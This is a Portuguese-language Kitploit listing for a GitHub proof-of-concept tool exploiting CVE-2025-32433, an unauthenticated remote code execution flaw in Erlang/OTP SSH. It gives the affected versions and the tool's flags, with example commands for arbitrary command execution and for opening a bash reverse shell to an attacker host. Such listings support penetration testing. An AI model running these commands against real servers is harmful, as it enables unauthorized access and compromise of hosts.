Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — A vulnerabilidade permite que um atacante com acesso de rede a um servidor SSH Erlang/OTP execute código arbitrário sem autenticação prévia. | Kitploit
Ferramentas/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
Análise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

A vulnerabilidade permite que um atacante com acesso de rede a um servidor SSH Erlang/OTP execute código arbitrário sem autenticação prévia.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
162há 1 anoAinda não revisado

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

A vulnerabilidade permite que um atacante com acesso à rede a um servidor SSH Erlang/OTP execute código arbitrário sem autenticação prévia.

Descrição

Uma vulnerabilidade grave foi identificada no servidor SSH Erlang/OTP que pode permitir que um atacante realize execução remota de código (RCE) não autenticada. Ao explorar uma falha no tratamento de mensagens do protocolo SSH, um agente malicioso pode obter acesso não autorizado a sistemas afetados e executar comandos arbitrários sem credenciais válidas. Isso pode levar ao comprometimento desses hosts, permitindo acesso não autorizado e manipulação de dados sensíveis por terceiros, ou ataques de negação de serviço.

Versões Afetadas

root@kitploit:~
OTP-27.3.2 e anteriores
OTP-26.2.5.10 e anteriores
OTP-25.3.2.19 e anteriores

Funcionalidades

  • Verificação de Vulnerabilidade: Determinar se um alvo é vulnerável ao CVE-2025-32433.
  • Execução de Exploit: Executar comandos arbitrários.
  • Reverse Shell: Iniciar um reverse shell baseado em bash.

Uso

root@kitploit:~
python cve-2025-32433.py <host> [opções]

Opções:

root@kitploit:~
-p PORT, --port PORT: Porta SSH (padrão: 22)

-t TIMEOUT, --timeout TIMEOUT: Tempo limite de conexão em segundos (padrão: 5)

-c COMMAND, --command COMMAND: Comando personalizado a ser executado

--check: Verificar se o alvo é vulnerável

-u urls.txt, --urlfile urls.txt: Arquivo contendo uma lista de hosts para escanear (um por linha)

-o output.txt, --output output.txt: Arquivo de saída para armazenar os resultados.

--shell: Iniciar um reverse shell

--lhost LHOST: IP do atacante para o reverse shell

--lport LPORT: Porta do atacante para o reverse shell (padrão: 4444)

Exemplos:

Verificar vulnerabilidade:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

Executar um comando:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

Iniciar um reverse shell:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

Referências

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Baixar ferramenta